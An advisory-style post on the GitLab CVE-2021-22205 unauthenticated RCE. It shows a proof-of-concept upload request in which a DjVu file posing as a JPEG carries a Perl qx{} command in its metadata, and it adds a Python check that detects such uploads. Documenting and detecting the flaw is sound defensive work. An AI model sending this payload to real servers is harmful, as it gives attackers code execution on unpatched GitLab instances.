CVE-2021-22205 GitLab Unauthenticated RCE

2021-11-05 10:35:18

Reference: https://hackerone.com/reports/1154542

Obtain the X-CSRF-Token

GET /users/sign_in

RCE

POST /uploads/user
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryIMv3mxRg59TkFSX5
X-CSRF-Token: {{csrf-token}}
Content-Disposition: form-data; name="file"; filename="test.jpg"
Content-Type: image/jpeg

AT&TFORM  疍JVMDIRM   .?    F   ?蘅?!葢N?亿堣k鍰,q領觧暯⒚"?FORM   ^DJVUINFO   
   d  INCL   shared_anno.iff BG44    J  婃岜7?*? BG44   鶡BG44   
FORM  DJVIANTa  P(metadata
  (Copyright "
" . qx{echo vakzz >/tmp/vakzz} . 
" b ") )

Remediation:

The issue is fixed in the GitLab 13.10.3 update.
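
A defensive content check for the upload shown above, as an added example that is not from the original post or from GitLab: it flags a file part declared as JPEG whose bytes are actually a DjVu container carrying an annotation chunk with code-like metadata. The function name, the heuristic regex and the sample bytes are constructed assumptions.

```python
import re

JPEG_MAGIC = b"\xff\xd8\xff"
DJVU_MAGIC = b"AT&TFORM"            # IFF header that opens a DjVu file
ANNOTATION_CHUNKS = (b"ANTa", b"ANTz")  # plain and compressed annotations
# Perl-style command syntax that has no place in image metadata (heuristic).
CODE_LIKE = re.compile(rb"qx\s*[{(\[/<]|system\s*\(|`")

def inspect_upload(filename: str, declared_type: str, body: bytes) -> list[str]:
    """Return findings for one uploaded file part; an empty list means clean."""
    findings = []
    claims_jpeg = (filename.lower().endswith((".jpg", ".jpeg"))
                   or declared_type.lower() == "image/jpeg")
    if claims_jpeg and not body.startswith(JPEG_MAGIC):
        findings.append("declared JPEG but content lacks JPEG magic bytes")
    if not body.startswith(DJVU_MAGIC):
        return findings
    findings.append("content is a DjVu container")
    for chunk in ANNOTATION_CHUNKS:
        pos = body.find(chunk)
        if pos == -1:
            continue
        findings.append(f"DjVu annotation chunk {chunk.decode()} present")
        tail = body[pos:]
        if b"(metadata" in tail and CODE_LIKE.search(tail):
            findings.append("annotation metadata contains code-like syntax")
    return findings

# Constructed sample inputs (not captured traffic, chunk lengths are dummies).
SUSPECT = (b"AT&TFORM\x00\x00\x00\x40DJVUANTa\x00\x00\x00\x30"
           b'(metadata (Copyright "x" . qx{PLACEHOLDER} . "y"))')
REAL_JPEG = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00" + b"\x00" * 16

if __name__ == "__main__":
    for name, ctype, data in (("test.jpg", "image/jpeg", SUSPECT),
                              ("photo.jpg", "image/jpeg", REAL_JPEG)):
        print(name, inspect_upload(name, ctype, data) or "clean")
```

A check like this belongs in an upload proxy or log-replay tooling as a stopgap and for retro-hunting; it complements the upgrade rather than replacing it.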
